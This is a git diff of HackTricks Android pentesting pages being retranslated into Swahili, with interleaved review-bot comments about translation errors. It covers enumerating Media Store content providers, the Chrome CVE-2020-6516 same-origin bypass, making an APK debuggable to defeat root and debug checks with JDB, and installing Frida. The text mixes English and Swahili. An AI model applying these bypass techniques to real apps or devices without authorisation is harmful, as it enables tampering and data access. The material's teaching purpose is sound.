* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -18,21 +19,21 @@ Njia nyingine za kusaidia HackTricks:
**Hii ni muhtasari wa chapisho [https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/](https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/)**
### Orodha ya Faili katika Hifadhi ya Media
Ili kuorodhesha faili zinazosimamiwa na Hifadhi ya Media, amri ifuatayo inaweza kutumika:
### Kuorodhesha Faili katika Media Store
Ili kuorodhesha faili zinazodhibitiwa na Media Store, amri iliyo hapa chini inaweza kutumika:
```bash
$ content query --uri content://media/external/file
```
Kwa matokeo yanayoeleweka zaidi na ya kirafiki kwa binadamu, onyesha tu kitambulisho na njia ya kila faili iliyohifadhiwa:
Ili kupata matokeo rafiki kwa binadamu, kuonyesha tu kitambulisho na njia ya kila faili iliyoorodheshwa:
```bash
$ content query --uri content://media/external/file --projection _id,_data
```
Content providers wamejitosheleza katika eneo lao binafsi la jina. Upatikanaji wa mtoa huduma unahitaji URI maalum ya `content://`. Taarifa kuhusu njia za kupata mtoa huduma zinaweza kupatikana kutoka kwa mizizi ya maombi au msimbo wa chanzo wa Android.
Watoa maudhui wamejengwa katika eneo lao la kibinafsi. Upatikanaji wa mtoa huduma unahitaji URI maalum ya `content://`. Taarifa kuhusu njia za kufikia mtoa huduma zinaweza kupatikana kutoka kwa hati za programu au msimbo wa chanzo wa mfumo wa Android.
### Upatikanaji wa Chrome kwa Watoa Huduma wa Yaliyomo
Chrome kwenye Android inaweza kupata watoa huduma wa yaliyomo kupitia mpango wa `content://`, kuruhusu kupata rasilimali kama picha au nyaraka zilizosafirishwa na programu za watu wa tatu. Ili kufafanua hili, faili inaweza kuingizwa kwenye Hifadhi ya Vyombo vya Habari na kisha kupatikana kupitia Chrome:
### Upatikanaji wa Chrome kwa Watoa Maudhui
Chrome kwenye Android inaweza kufikia watoa maudhui kupitia mpango wa `content://`, ikiruhusu kufikia rasilimali kama picha au hati zilizotolewa na programu za wahusika wengine. Ili kuonyesha hili, faili inaweza kuingizwa kwenye Duka la Media na kisha kufikiwa kupitia Chrome:
Ingiza kuingia desturi kwenye Hifadhi ya Vyombo vya Habari:
Ingiza kipengee maalum kwenye Duka la Media:
```bash
cd /sdcard
echo "Hello, world!" > test.txt
@ -40,27 +41,27 @@ content insert --uri content://media/external/file \
--bind _data:s:/storage/emulated/0/test.txt \
--bind mime_type:s:text/plain
```
Pata kitambulisho cha faili iliyowekwa hivi karibuni:
Gundua kitambulisho cha faili mpya iliyoongezwa:
```bash
content query --uri content://media/external/file \
--projection _id,_data | grep test.txt
# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt
```
Faili hiyo inaweza kisha kuonekana kwenye Chrome kwa kutumia URL iliyojengwa na kitambulisho cha faili.
Ili faili liweze kuonyeshwa kwenye Chrome, tumia URL iliyoundwa na kitambulisho cha faili.
Kwa mfano, kuorodhesha faili zinazohusiana na programu maalum:
Kwa mfano, ili kuorodhesha faili zinazohusiana na programu maalum:
```bash
content query --uri content://media/external/file --projection _id,_data | grep -i <app_name>
```
### Chrome CVE-2020-6516: Kupuuza Sera ya Asili-Sawa
### Chrome CVE-2020-6516: Same-Origin-Policy Bypass
_Sera ya Asili-Sawa_ (SOP) ni itifaki ya usalama katika vivinjari ambayo inazuia kurasa za wavuti kuingiliana na rasilimali kutoka asili tofauti isipokuwa imeidhinishwa wazi na sera ya Kuvuka-Mwanzo-Mzazi (CORS). Sera hii inalenga kuzuia uvujaji wa habari na udanganyifu wa ombi la kurasa kati ya tovuti. Chrome inachukulia `content://` kama mpango wa ndani, ikimaanisha sheria kali za SOP, ambapo kila URL ya mpango wa ndani inachukuliwa kama asili tofauti.
The _Same Origin Policy_ (SOP) ni itifaki ya usalama katika vivinjari inayopunguza kurasa za wavuti kutoka kuingiliana na rasilimali kutoka vyanzo tofauti isipokuwa ikiruhusiwa wazi na sera ya Cross-Origin-Resource-Sharing (CORS). Sera hii inalenga kuzuia uvujaji wa taarifa na udanganyifu wa maombi ya tovuti tofauti. Chrome inachukulia `content://` kama mpango wa ndani, ikimaanisha sheria za SOP kali, ambapo kila URL ya mpango wa ndani inachukuliwa kama chanzo tofauti.
Hata hivyo, CVE-2020-6516 ilikuwa udhaifu katika Chrome ulioruhusu kupuuza sheria za SOP kwa rasilimali zilizopakiwa kupitia URL ya `content://`. Kwa athari, msimbo wa JavaScript kutoka URL ya `content://` ulikuwa na uwezo wa kupata rasilimali nyingine zilizopakiwa kupitia URL za `content://`, ambayo ilikuwa wasiwasi mkubwa wa usalama, hasa kwenye vifaa vya Android vinavyotumia toleo kabla ya Android 10, ambapo uhifadhi uliolengwa haukuwa umetekelezwa.
Hata hivyo, CVE-2020-6516 ilikuwa udhaifu katika Chrome ambao uliruhusu kupita sheria za SOP kwa rasilimali zilizopakiwa kupitia URL ya `content://`. Kwa hivyo, msimbo wa JavaScript kutoka URL ya `content://` ungeweza kufikia rasilimali nyingine zilizopakiwa kupitia URL za `content://`, ambayo ilikuwa wasiwasi mkubwa wa usalama, hasa kwenye vifaa vya Android vinavyotumia toleo la kabla ya Android 10, ambapo uhifadhi wa kiwango haukuwekwa.
Uthibitisho wa dhana hapo chini unaonyesha udhaifu huu, ambapo hati ya HTML, baada ya kupakiwa chini ya **/sdcard** na kuongezwa kwenye Hifadhi ya Vyombo vya Habari, inatumia `XMLHttpRequest` katika JavaScript yake kupata na kuonyesha maudhui ya faili nyingine kwenye Hifadhi ya Vyombo vya Habari, kwa kupuuza sheria za SOP.
The proof-of-concept below demonstrates this vulnerability, where an HTML document, after being uploaded under **/sdcard** and added to the Media Store, uses `XMLHttpRequest` in its JavaScript to access and display the contents of another file in the Media Store, bypassing the SOP rules.
Uthibitisho wa Dhana wa HTML:
Proof-of-Concept HTML:
```xml
<html>
<head>
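Review bot: the replacement lines for the proof-of-concept paragraph (`The proof-of-concept below demonstrates this vulnerability, where an HTML document, ...`) and its label (`Proof-of-Concept HTML:`) are untranslated English replacing the Swahili of the previous version, and the SOP paragraph now opens with an English `The` before `_Same Origin Policy_ (SOP) ni`; translate these back to Swahili so the section matches the rest of the page. Unrelated to the translation but visible in the context lines: the proof-of-concept is an HTML document but its fence is tagged ```xml; ```html would be the accurate language tag.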
@ -93,16 +94,17 @@ xhr.send();
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
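Review bot: the Twitter item in this footer reads `**fuata** sisi kwenye **Twitter**` while the same support banner in the other files of this commit reads `**tufuatilie** kwenye **Twitter**`; use the consistent form here.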

@ -1,85 +1,110 @@
# Kudukua programu inayoweza kudebugiwa
# Exploiting a debuggeable application
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# **Kudukua ukaguzi wa root na uwezo wa kudebugiwa**
# **Bypassing root and debuggeable checks**
Sehemu hii ya chapisho ni muhtasari kutoka chapisho [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
Sehemu hii ya chapisho ni muhtasari kutoka kwa chapisho [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
## Hatua za Kufanya Programu ya Android Iweze Kudebugiwa na Kudukua Ukaguzi
## Steps to Make an Android App Debuggable and Bypass Checks
### **Kufanya Programu Iweze Kudebugiwa**
### **Making the App Debuggable**
Yaliyomo yamechukuliwa kutoka https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0
Maudhui yanategemea https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0
1. **Kudondoa APK:**
- Tumia zana ya APK-GUI kudondoa APK.
- Katika faili ya _android-manifest_, ingiza `android:debuggable=true` kuwezesha hali ya kudebugiwa.
- Dondoa tena, saini, na zipalign programu iliyobadilishwa.
1. **Decompile the APK:**
- Tumia zana ya APK-GUI kwa ajili ya decompiling APK.
- Katika faili _android-manifest_, weka `android:debuggable=true` ili kuwezesha hali ya debugging.
- Recompile, sign, na zipalign programu iliyobadilishwa.
2. **Sakinisha Programu Iliyobadilishwa:**
- Tumia amri: `adb install <jina_la_programu>`.
2. **Install the Modified Application:**
- Tumia amri: `adb install <application_name>`.
3. **Pata Jina la Pakiti:**
- Tekeleza `adb shell pm list packages 3` kuorodhesha programu za watu wengine na kupata jina la pakiti.
3. **Retrieve the Package Name:**
- Tekeleza `adb shell pm list packages 3` ili orodhesha programu za wahusika wengine na kupata jina la kifurushi.
4. **Weka Programu Iwe Ngoja Uunganisho wa Kudebugiwa:**
- Amri: `adb shell am setup-debug-app w <jina_la_pakiti>`.
- **Kumbuka:** Amri hii lazima itekelezwe kila wakati kabla ya kuanza programu ili kuhakikisha inangoja kudebugiwa.
- Kwa uthabiti, tumia `adb shell am setup-debug-app w -persistent <jina_la_pakiti>`.
- Ili kuondoa alama zote, tumia `adb shell am clear-debug-app <jina_la_pakiti>`.
4. **Set the App to Await Debugger Connection:**
- Amri: `adb shell am setup-debug-app w <package_name>`.
- **Kumbuka:** Amri hii lazima ifanywe kila wakati kabla ya kuanzisha programu ili kuhakikisha inasubiri debugger.
- Kwa kudumu, tumia `adb shell am setup-debug-app w -persistent <package_name>`.
- Kuondoa bendera zote, tumia `adb shell am clear-debug-app <package_name>`.
5. **Jitayarisha kwa Kudebugiwa kwenye Android Studio:**
- Nenda kwenye Android Studio kwa kubonyeza _File -> Open Profile or APK_.
- Fungua APK iliyobadilishwa.
5. **Prepare for Debugging in Android Studio:**
- Tembea katika Android Studio hadi _File -> Open Profile or APK_.
- Fungua APK iliyorekebishwa.
6. **Weka Alama za Kusimamisha katika Faili za Java muhimu:**
- Weka alama za kusimamisha katika `MainActivity.java` (hasa katika njia ya `onCreate`), `b.java`, na `ContextWrapper.java`.
6. **Set Breakpoints in Key Java Files:**
- Weka breakpoints katika `MainActivity.java` (hasa katika njia ya `onCreate`), `b.java`, na `ContextWrapper.java`.
### **Kudukua Ukaguzi**
### **Bypassing Checks**
Programu, katika maeneo fulani, itathibitisha ikiwa inaweza kudebugiwa na pia itafanya ukaguzi wa faili za binary zinazoonyesha kifaa kilichorootiwa. Kudebugiwa kunaweza kutumika kubadilisha habari za programu, kufuta biti ya kudebugiwa, na kubadilisha majina ya faili za binary zinazotafutwa ili kudukua ukaguzi huu.
Programu, katika hatua fulani, itathibitisha ikiwa inapatikana kwa debugging na pia itakagua binaries zinazoashiria kifaa kilichoshikiliwa. Debugger inaweza kutumika kubadilisha taarifa za programu, kuondoa kipande cha debuggable, na kubadilisha majina ya binaries yanayotafutwa ili kupita hizi checks.
Kwa ukaguzi wa kudebugiwa:
Kwa ajili ya ukaguzi wa debuggable:
1. **Badilisha Mipangilio ya Alama:**
- Katika sehemu ya mchanganyiko wa konsoli ya kudebugi, nenda kwenye: `this mLoadedAPK -> mApplicationInfo -> flags = 814267974`.
- **Kumbuka:** Uwakilishi wa binary wa `flags = 814267974` ni `11000011100111011110`, ikionyesha kuwa "Flag_debuggable" iko hai.
1. **Modify Flag Settings:**
- Katika sehemu ya mabadiliko ya debugger console, tembea hadi: `this mLoadedAPK -> mApplicationInfo -> flags = 814267974`.
- **Kumbuka:** Uwiano wa binary wa `flags = 814267974` ni `11000011100111011110`, ikionyesha kuwa "Flag_debuggable" inafanya kazi.
![https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png](https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png)
Hatua hizi zinahakikisha kuwa programu inaweza kudebugiwa na ukaguzi fulani wa usalama unaweza kudukuliwa kwa kutumia kudebugi, kurahisisha uchambuzi au ubadilishaji wa kina wa tabia ya programu.
Hatua hizi kwa pamoja zinahakikisha kuwa programu inaweza kudebugiwa na kwamba ukaguzi fulani wa usalama unaweza kupitishwa kwa kutumia debugger, ikiruhusu uchambuzi wa kina au mabadiliko ya tabia ya programu.
Hatua ya 2 inahusisha kubadilisha thamani ya alama kuwa 814267972, ambayo inawakilishwa kwa binary kama 110000101101000000100010100.
Hatua ya 2 inahusisha kubadilisha thamani ya bendera kuwa 814267972, ambayo inawakilishwa kwa binary kama 110000101101000000100010100.
# **Kudukua Udhaifu**
# **Exploiting a Vulnerability**
Onyesho lilifanywa kwa kutumia programu yenye udhaifu ambayo ina kifungo na maandishi. Awali, programu inaonyesha "Crack Me". Lengo ni kubadilisha ujumbe kutoka "Try Again" hadi "Hacked" wakati wa muda wa uendeshaji, bila kubadilisha msimbo wa chanzo.
Uonyeshaji ulitolewa kwa kutumia programu yenye udhaifu inayojumuisha kitufe na textview. Kwanza, programu inaonyesha "Crack Me". Lengo ni kubadilisha ujumbe kutoka "Try Again" kuwa "Hacked" wakati wa utendaji, bila kubadilisha msimbo wa chanzo.
## **Kuangalia Udhaifu**
- Programu ilidondolewa kwa kutumia `apktool` ili kupata faili ya `AndroidManifest.xml`.
- Kuwepo kwa `android_debuggable="true"` katika AndroidManifest.xml kunamaanisha programu inaweza kudebugiwa na inaweza kudukuliwa.
- Ni muhimu kutambua kuwa `apktool` inatumika tu kuangalia hali ya kudebugiwa bila kubadilisha msimbo wowote.
## **Checking for Vulnerability**
- Programu ilitolewa kwa kutumia `apktool` ili kufikia faili ya `AndroidManifest.xml`.
- Uwepo wa `android_debuggable="true"` katika AndroidManifest.xml inaonyesha kuwa programu inapatikana kwa debugging na inaweza kuathiriwa.
- Inafaa kutambua kuwa `apktool` inatumika pekee kuangalia hali ya debuggable bila kubadilisha msimbo wowote.
## **Kujiandaa kwa Usanidi**
- Mchakato ulihusisha kuanzisha emulator, kusakinisha programu yenye udhaifu, na kutumia `adb jdwp` kutambua bandari za Dalvik VM zinazosikiliza.
- JDWP (Java Debug Wire Protocol) inaruhusu kudebugiwa kwa programu inayotumika kwenye VM kwa kufunua bandari ya kipekee.
- Uhamishaji wa bandari ulikuwa muhimu kwa kudebugiwa kwa mbali, ikifuatiwa na kuunganisha JDB kwenye programu lengwa.
## **Preparing the Setup**
- Mchakato ulijumuisha kuanzisha emulator, kufunga programu yenye udhaifu, na kutumia `adb jdwp` ili kubaini bandari za Dalvik VM zinazot listening.
- JDWP (Java Debug Wire Protocol) inaruhusu debugging ya programu inayotembea katika VM kwa kufichua bandari ya kipekee.
- Kuelekeza bandari ilikuwa muhimu kwa ajili ya debugging ya mbali, ikifuatiwa na kuunganisha JDB kwenye programu lengwa.
## **Kuingiza Kanuni Wakati wa Muda wa Uendeshaji**
- Udanganyifu ulifanywa kwa kuweka alama za kusimamisha na kudhibiti mtiririko wa programu.
- Amri kama `classes` na `methods <jina_la_darasa>` zilitumika kufunua muundo wa programu.
- Alama ya kusimamisha ilowekwa kwenye njia ya `onClick`, na utekelezaji wake ulidhibitiwa.
- Am
## **Injecting Code at Runtime**
- Utekelezaji ulifanywa kwa kuweka breakpoints na kudhibiti mtiririko wa programu.
- Amri kama `classes` na `methods <class_name>` zilitumika kufichua muundo wa programu.
- Breakpoint ilipangwa katika njia ya `onClick`, na utekelezaji wake ulidhibitiwa.
- Amri za `locals`, `next`, na `set` zilitumika kukagua na kubadilisha mabadiliko ya ndani, hasa kubadilisha ujumbe wa "Try Again" kuwa "Hacked".
- Msimbo uliobadilishwa ulitekelezwa kwa kutumia amri ya `run`, ikibadilisha matokeo ya programu kwa wakati halisi.
Mfano huu ulionyesha jinsi tabia ya programu inayopatikana kwa debugging inaweza kubadilishwa, ikionyesha uwezekano wa udanganyifu zaidi wa hali kama kupata ufikiaji wa shell kwenye kifaa katika muktadha wa programu.
## References
* [https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
* [https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
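Review bot: the new heading lines of this file (`# Exploiting a debuggeable application`, `## Steps to Make an Android App Debuggable and Bypass Checks`, the numbered step titles and the later `## **...**` sections) and the support-banner items (`Check the [**subscription plans**]...`) are left in English, replacing the Swahili text of the previous version, while the other files in this commit translate them; the two headings also spell `debuggeable` where `debuggable` is meant, and `zinazot listening` in the JDWP setup bullet is a broken half-translation of the old line's `zinazosikiliza`. One accuracy point carried over from the old text into the new: the vulnerability-check bullet writes the manifest attribute as `android_debuggable="true"`, while the decompile step in the same file correctly uses `android:debuggable`; the colon form is the real attribute name and the bullet should match it.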

@ -1,34 +1,35 @@
# Mafunzo ya Frida
# Frida Tutorial
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
<figure><img src="../../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**Mshauri wa tuzo za mdudu**: **Jisajili** kwa **Intigriti**, jukwaa la tuzo za mdudu la malipo la juu lililoanzishwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata tuzo hadi **$100,000**!
**Nasaha ya bug bounty**: **jiandikishe** kwa **Intigriti**, jukwaa la **bug bounty la premium lililotengenezwa na hackers, kwa hackers**! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na uanze kupata zawadi hadi **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
## Usanidi
## Installation
Sanidi **zana za frida**:
Sakinisha **frida tools**:
```bash
pip install frida-tools
pip install frida
```
**Pakua na usakinishe** kwenye kifaa cha android **seva ya frida** ([Pakua toleo jipya](https://github.com/frida/frida/releases)).\
Mstari mmoja wa kuwasha upya adb kwa mode ya root, kuunganisha kwenye kifaa, kupakia frida-server, kutoa ruhusa za utekelezaji na kuendesha kwa nyuma:
**Pakua na sakinisha** katika android **frida server** ([Pakua toleo jipya zaidi](https://github.com/frida/frida/releases)).\
Mstari mmoja wa kuanzisha adb tena katika hali ya mizizi, kuungana nayo, kupakia frida-server, kutoa ruhusa za kutekeleza na kuikimbia katika hali ya nyuma:
{% code overflow="wrap" %}
```bash
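Review bot: the new translation at L2856 renders "root mode" as "hali ya mizizi" (mizizi are plant roots) and "run it in the background" as "kuikimbia katika hali ya nyuma" (kukimbia is "to run away"); keep the technical term untranslated as the replaced line L2854 did ("mode ya root") and use "kuiendesha kwa nyuma", so the sentence still describes what the `adb root; adb connect ...` one-liner at L2859 actually does. The header block and "Sakinisha **frida tools**" at L2848 read correctly.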
@ -36,40 +37,40 @@ adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local
```
{% endcode %}
**Angalia** kama **inavyofanya kazi**:
**Angalia** ikiwa inafanya **kazi**:
```bash
frida-ps -U #List packages and processes
frida-ps -U | grep -i <part_of_the_package_name> #Get all the package name
```
## Mafunzo
## Tutorials
### [Mafunzo ya 1](frida-tutorial-1.md)
### [Tutorial 1](frida-tutorial-1.md)
**Kutoka**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\
**From**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\
**APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\
**Msimbo wa Chanzo**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
**Source Code**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
**Fuata [kiungo hiki kusoma](frida-tutorial-1.md).**
**Follow the [link to read it](frida-tutorial-1.md).**
### [Mafunzo ya 2](frida-tutorial-2.md)
### [Tutorial 2](frida-tutorial-2.md)
**Kutoka**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Sehemu 2, 3 & 4)\
**APKs na Msimbo wa Chanzo**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
**From**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Sehemu 2, 3 & 4)\
**APKs and Source code**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
**Fuata [kiungo hiki kusoma](frida-tutorial-2.md).**
**Follow the[ link to read it.](frida-tutorial-2.md)**
### [Mafunzo ya 3](owaspuncrackable-1.md)
### [Tutorial 3](owaspuncrackable-1.md)
**Kutoka**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk)
**Fuata [kiungo hiki kusoma](owaspuncrackable-1.md).**
**Follow the [link to read it](owaspuncrackable-1.md).**
**Unaweza kupata skripti zaidi za Frida hapa:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
